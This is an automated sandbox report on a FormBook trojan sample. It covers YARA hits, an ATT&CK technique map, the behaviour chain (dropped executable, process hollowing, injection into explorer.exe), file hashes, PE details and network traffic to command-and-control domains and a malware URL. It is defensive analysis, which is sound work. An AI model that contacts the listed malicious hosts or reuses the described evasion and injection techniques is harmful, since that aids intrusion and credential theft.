          Source: Yara matchFile source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.jfotlqeoqb.exe.1660000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jfotlqeoqb.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.jfotlqeoqb.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.287926712.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292821127.0000000001660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545200841.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545564197.0000000002680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372936782.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.290240049.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372684561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.372998768.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.337685693.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.359555357.000000000EC39000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.545372443.0000000002600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception612
          Process Injection          		1
          Rootkit          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Credential API Hooking          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Virtualization/Sandbox Evasion          		1
          Input Capture          		251
          Security Software Discovery          		Remote Desktop Protocol1
          Input Capture          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)612
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 635291 Sample: skyrunyyu655432.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 5 other signatures 2->53 11 skyrunyyu655432.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\...\jfotlqeoqb.exe, PE32 11->31 dropped 14 jfotlqeoqb.exe 11->14         started        process5 signatures6 65 Multi AV Scanner detection for dropped file 14->65 67 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->67 69 Tries to detect virtualization through RDTSC time measurements 14->69 71 Injects a PE file into a foreign processes 14->71 17 jfotlqeoqb.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 17->20 injected process9 dnsIp10 33 dawonderer.com 66.235.200.147, 49755, 80 CLOUDFLARENETUS United States 20->33 35 www.dawonderer.com 20->35 37 3 other IPs or domains 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Uses ipconfig to lookup or modify the Windows network settings 20->57 24 ipconfig.exe 20->24         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 24->59 61 Maps a DLL or memory area into another process 24->61 63 Tries to detect virtualization through RDTSC time measurements 24->63 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          skyrunyyu655432.exe42%VirustotalBrowse
          skyrunyyu655432.exe34%ReversingLabsWin32.Trojan.FormBook

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe37%ReversingLabsWin32.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.jfotlqeoqb.exe.1660000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.jfotlqeoqb.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.jfotlqeoqb.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.jfotlqeoqb.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.0.jfotlqeoqb.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.boxberry-my.com/sn31/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com
          		52.71.57.184
          		truefalse
            		high
            dawonderer.com
            		66.235.200.147
            		truetrue
              		unknown
              www.dawonderer.com
              		unknown
              		unknowntrue
                		unknown
                www.bolacorner.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.boxberry-my.com/sn31/true
                  • Avira URL Cloud: malware
                  		low

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.hugedomains.com/domain_profile.cfm?d=bolacorner.comipconfig.exe, 0000000D.00000002.547196966.00000000035CF000.00000004.10000000.00040000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    52.71.57.184
                    		hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comUnited States
                    		14618AMAZON-AESUSfalse
                    66.235.200.147
                    		dawonderer.comUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:635291
                    Start date and time: 27/05/202218:34:012022-05-27 18:34:01 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 10m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:skyrunyyu655432.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:24
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@9/4@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 58.7% (good quality ratio 53.8%)
                    • Quality average: 73.1%
                    • Quality standard deviation: 31.5%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Temp\2e29kg38w1e

                    Download File
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):189439
                    Entropy (8bit):7.990724029974516
                    Encrypted:true
                    SSDEEP:3072:df6pBR3Wqc50keMwga+5HZsjYyOWdWRtFgR/r5OKOgYRsh:dCIqG0HM6aHZszOWdaFw/r59Ojsh
                    MD5:83D312E5E420E4BD50B6C4439A68C9DF
                    SHA1:19EC197E9059CF609F9C8279974A8C114C0F1DE9
                    SHA-256:9749AACEAF7D57AA02FFE602524DAE4BF33B9A2D4EE5E814AC668A5D145E128E
                    SHA-512:0101859052ADBB1E10DF3F57E627160C8AB325FD5C199D3F7D3568EE7F18CA3F1F013C793D9BBFEDB87183B670855069048CFAE1930562DDD40ACF021B853F78
                    Malicious:false
                    Reputation:low
                    Preview:.p..*...&....N.SNd(....b..o.f.1/U.5.r...VT.G9C....0V.d\...h.Eq......ih.d..gk..v6...4<.@....M.H...|.S.A..\....0 ...4...C.RH.0F.C..,.)y...pm.....+...C\E..w.q..*kf..i.5...ml.....G(.x[..W..k...S..Z...M..ua...p.|.....p9.kGOK73.._..'.............3%........e..J...k.._.ku.....NUU...r..VT.G9n....0VE.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x.......6.^.W.......M..ua.$...X.....B.kGOK73...w....C....x...3m.......&e..J...k.._.ku.....1/U.5.r...VT.G9C....0V.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x[..W.....^oW...v...M..ua.$...X.....9.kGOK73...w....C....x...3m.......&e..J...k.._.ku.....1/U.5.r...VT.G9C....0V.d\...h.Eq...........$...7pw0$....P..ko.6...".."..[[_....zb........RH.0F.........=7!3........X>(.kE.....$*../...:...+.6L....G(.x[..W.....^oW...v...M..ua.$...X.....9.kGOK73.

                    C:\Users\user\AppData\Local\Temp\jfotlqeoqb.exe

                    Download File
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):134144
                    Entropy (8bit):6.4123316660425616
                    Encrypted:false
                    SSDEEP:1536:RcTOG+x8+YaGDARvmJVBqNvnlajcCOO0LdXU8JiA1Oy9f6zqjzswa+98qSIJnXSe:5fbnR6BqNvncvhwiz2swteq4iG5sCq
                    MD5:E85BB68B7CBEFADF0D1ACD4B7B8BD528
                    SHA1:6260AB4FE9793DE221C38E2785EE011178492891
                    SHA-256:D4286A555EF8679CFCB40ADE56C210469C749EC48718E84FBFEA3B472825518B
                    SHA-512:5011822C9BDF7F64E2AD2921D1AD15722AA2C6109BC5FB1C5115928D8057949FFCECD79E408A8731E9B4527795494E367DA7B70112360EA529F1BAD107175310
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 37%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.}c{.}c{.}c{./.{.}c{./.{.}c{./.{.}c{(.bz.}c{.}b{.}c{y.gz.}c{y..{.}c{y.az.}c{Rich.}c{........................PE..L...s..b..........................................@..........................`............@..........................................@.......................P..........T...............................@............................................text...5........................... ..`.rdata..>N.......P..................@..@.data....1..........................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\nspF162.tmp

                    Download File
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):334550
                    Entropy (8bit):7.528668807103741
                    Encrypted:false
                    SSDEEP:6144:w/CIqG0HM6aHZszOWdaFw/r59OjsepvncWHsSGw:xNza5gzuoIcWHsS
                    MD5:BDB87446E9230A4B38ACB065FD1A9368
                    SHA1:99B36BFF00A3DC4D17E232E6D5EAFC56D387104A
                    SHA-256:23140E1941470A9F0A5A2866DE11B9F406AA4C2A2CC1FED10DE02A2FE8992F77
                    SHA-512:6EB8D2605E7CE5EF6A3CECE02FFBA33C863C74B2384F38B476EFF1B91F7E41658CD8BAC862D46117823443B562296A7685894ED717DC87D4C8439C90F0BE8946
                    Malicious:false
                    Reputation:low
                    Preview:I.......,...................H...................I...........................................................................................................................................................................................................................................B...................j...............................................................................................................................].......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\pvrclmgpss

                    Download File
                    Process:C:\Users\user\Desktop\skyrunyyu655432.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4734
                    Entropy (8bit):6.200882416738238
                    Encrypted:false
                    SSDEEP:96:JATyzXT6CUhIueeyfioCBRFAfgbMRE5jBL8q5y55m0Y:JATy3VveoBoFAfgb6wFqk
                    MD5:15004B2E0FE7FC55E5E6FBFACF737244
                    SHA1:509F67F7A859512E9964D9AA9EC38329AF4C2B6A
                    SHA-256:24051CD359262971B696AD209D9A66C43221A389C56B7324B7FA4D2DF7DB5C00
                    SHA-512:71BF196170FFDE6C22E0E39759891709B7947D5332BE5E5EDEFD97B2AFA1CA301FEEFBC9BFBE817FC6EF1726BBB0DF97B66B3075C08093825823841546C0014F
                    Malicious:false
                    Preview:....................L~...l..L~...d..t.E.................t.d......T..`........t.d......\..h........t.dS.....D..P........t.d@.....L..X......z..qL...+..l......d..[..d.....d....C.Rz..u...d....B..........z.d......8.Q1....T..\..D...L...l..d.........u............T............d....E.8.9.....8.Q...........[B........L~...t................C..C...t.............t..[B...^.dr...d..B...~.m.d..d..B....!.d...d...B........L~...dE.t......T....t.....^.........t...t..d....L....+z..q[...T..`..d+z..Cc...T..`z.z..qL...T..~.m.dQ....dR........d...d................E.........[B.........L~...dE.t......L....t.....^.........t...t..d+....L........+z..q[...L..X..+z..Cc...L..X..+z..Sc..L..X...[z..qR...L..X..d+z..Cc...L..Xz.z..qL...L..^.db....d..............d...................d................E.........[B.......E.t...........t.....^.........t...t..d"....L....+z..q[......d..+z..Cc......dz.z..qL.......!.d?....d0...........d5..

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Entropy (8bit):7.939796551575706
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 92.16%
                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:skyrunyyu655432.exe
                    File size:278102
                    MD5:070a940ccbc84f85a8ba749eccf55618
                    SHA1:b6624708fa177d6a591c01ba291d40390bb6d8e7
                    SHA256:a734d235386d77a1c6a88bdf63efce5134a82a90e113be647200401b717b891e
                    SHA512:5bcd64f98431c61774901e6fd0dca10e39634ba52b122d4362df8f335ba30f70e6ccf04dacef9af2af1b1a5351d2d27b279ce87c1a92783478c2534502ea69cb
                    SSDEEP:6144:B0Ykc3Mje3wl1Xv3pXF0E3/eIZpg63Zb73lUWeboQXJKAw2mttww:0Gyzl1/3HeItJVUWulQAw2rw
                    TLSH:504412D337E2C1EBD4070A315F7665B2F371A268932B52C70BA05F2A6F711CAD912296
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z.........

                    File Icon

                    Icon Hash:b2a88c96b2ca6a72

                    Static PE Info

                    General

                    Entrypoint:0x4032fa
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    DLL Characteristics:
                    Time Stamp:0x4669CEB6 [Fri Jun 8 21:48:38 2007 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:55f3dfd13c0557d3e32bcbc604441dd3

                    Entrypoint Preview

                    Instruction
                    sub esp, 00000180h
                    push ebx
                    push ebp
                    push esi
                    xor ebx, ebx
                    push edi
                    mov dword ptr [esp+18h], ebx
                    mov dword ptr [esp+10h], 00409170h
                    xor esi, esi
                    mov byte ptr [esp+14h], 00000020h
                    call dword ptr [00407030h]
                    push ebx
                    call dword ptr [00407278h]
                    mov dword ptr [00423FD4h], eax
                    push ebx
                    lea eax, dword ptr [esp+34h]
                    push 00000160h
                    push eax
                    push ebx
                    push 0041F4E8h
                    call dword ptr [00407154h]
                    push 0040922Ch
                    push 00423720h
                    call 00007F3D90DA7A58h
                    call dword ptr [004070B4h]
                    mov edi, 00429000h
                    push eax
                    push edi
                    call 00007F3D90DA7A46h
                    push ebx
                    call dword ptr [00407108h]
                    cmp byte ptr [00429000h], 00000022h
                    mov dword ptr [00423F20h], eax
                    mov eax, edi
                    jne 00007F3D90DA52BCh
                    mov byte ptr [esp+14h], 00000022h
                    mov eax, 00429001h
                    push dword ptr [esp+14h]
                    push eax
                    call 00007F3D90DA7539h
                    push eax
                    call dword ptr [00407218h]
                    mov dword ptr [esp+1Ch], eax
                    jmp 00007F3D90DA5315h
                    cmp cl, 00000020h
                    jne 00007F3D90DA52B8h
                    inc eax
                    cmp byte ptr [eax], 00000020h
                    je 00007F3D90DA52ACh
                    cmp byte ptr [eax], 00000022h
                    mov byte ptr [esp+14h], 00000020h
                    jne 00007F3D90DA52B8h
                    inc eax
                    mov byte ptr [esp+14h], 00000022h
                    cmp byte ptr [eax], 0000002Fh
                    jne 00007F3D90DA52E5h
                    inc eax
                    cmp byte ptr [eax], 00000053h
                    jne 00007F3D90DA52C0h

                    Rich Headers

                    Programming Language:
                    • [EXP] VC++ 6.0 SP5 build 8804

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a00xb4.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x288.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x59ac0x5a00False0.668142361111data6.45807821776IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata0x70000x117a0x1200False0.4453125data5.17513527374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x90000x1afd80x400False0.6015625data4.98110806401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .rsrc0x2c0000x9000xa00False0.409375data3.94448786242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                    RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, CreateFileA, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, CloseHandle, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    192.168.2.366.235.200.14749755802031412 05/27/22-18:36:55.446707TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.366.235.200.147
                    192.168.2.366.235.200.14749755802031453 05/27/22-18:36:55.446707TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.366.235.200.147
                    192.168.2.366.235.200.14749755802031449 05/27/22-18:36:55.446707TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.366.235.200.147

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 27, 2022 18:36:55.291124105 CEST4975580192.168.2.366.235.200.147
                    May 27, 2022 18:36:55.308113098 CEST804975566.235.200.147192.168.2.3
                    May 27, 2022 18:36:55.308240891 CEST4975580192.168.2.366.235.200.147
                    May 27, 2022 18:36:55.446707010 CEST4975580192.168.2.366.235.200.147
                    May 27, 2022 18:36:55.463802099 CEST804975566.235.200.147192.168.2.3
                    May 27, 2022 18:36:55.949002028 CEST4975580192.168.2.366.235.200.147
                    May 27, 2022 18:36:55.968122005 CEST804975566.235.200.147192.168.2.3
                    May 27, 2022 18:36:55.968209028 CEST4975580192.168.2.366.235.200.147
                    May 27, 2022 18:37:16.683904886 CEST4976280192.168.2.352.71.57.184
                    May 27, 2022 18:37:16.821118116 CEST804976252.71.57.184192.168.2.3
                    May 27, 2022 18:37:16.821217060 CEST4976280192.168.2.352.71.57.184
                    May 27, 2022 18:37:16.821484089 CEST4976280192.168.2.352.71.57.184
                    May 27, 2022 18:37:16.958137035 CEST804976252.71.57.184192.168.2.3
                    May 27, 2022 18:37:16.958177090 CEST804976252.71.57.184192.168.2.3
                    May 27, 2022 18:37:16.958417892 CEST4976280192.168.2.352.71.57.184
                    May 27, 2022 18:37:16.958487034 CEST4976280192.168.2.352.71.57.184
                    May 27, 2022 18:37:17.094350100 CEST804976252.71.57.184192.168.2.3

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 27, 2022 18:36:54.274760008 CEST4987353192.168.2.38.8.8.8
                    May 27, 2022 18:36:54.414109945 CEST53498738.8.8.8192.168.2.3
                    May 27, 2022 18:37:16.569818974 CEST6526653192.168.2.38.8.8.8
                    May 27, 2022 18:37:16.679555893 CEST53652668.8.8.8192.168.2.3

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    May 27, 2022 18:36:54.274760008 CEST192.168.2.38.8.8.80x62efStandard query (0)www.dawonderer.comA (IP address)IN (0x0001)
                    May 27, 2022 18:37:16.569818974 CEST192.168.2.38.8.8.80x79c2Standard query (0)www.bolacorner.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
